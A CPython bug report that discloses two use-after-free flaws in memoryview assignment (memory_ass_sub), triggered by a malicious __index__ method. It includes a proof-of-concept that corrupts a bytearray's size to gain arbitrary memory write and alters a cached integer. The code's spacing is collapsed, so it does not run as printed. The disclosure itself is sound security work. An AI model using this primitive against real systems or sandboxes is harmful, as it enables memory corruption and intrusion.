Bug report

within memoryview.c, I have found two Use After Frees, both based aroundmemory_ass_sub.
The first is if a class with a malicious__index__ method is used as the index for the assignment, its index method is called after the memoryview is checked if it is released. This allows the index method to release the memory view and backing buffer, leading to a write to freed memory when the write completes. The same vuln exists if the class with a malicious index method is used as the assigned value, as its__index__ method is called inside ofpack_single

# memoryview Use After Free (memory_ass_sub)uaf_backing=bytearray(bytearray.__basicsize__)uaf_view=memoryview(uaf_backing).cast('n')# ssize_t formatclassweird_index:def__index__(self):globalmemory_backinguaf_view.release()# release memoryview (UAF)# free `uaf_backing` memory and allocate a new bytearray into itmemory_backing=uaf_backing.clear()orbytearray()return2# `ob_size` idx# by the time this line finishes executing, it writes the max ptr size# into the `ob_size` slot of `memory_backing`uaf_view[weird_index()]= (2** (tuple.__itemsize__*8)-1)//2memory=memoryview(memory_backing)memory[id(250)+int.__basicsize__]=100print(250)# prints 100

Your environment

• CPython versions tested on: Python 3.10.2 (main, Feb 2 2022, 07:36:01) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin
• Operating system and architecture: MacOS, 64bit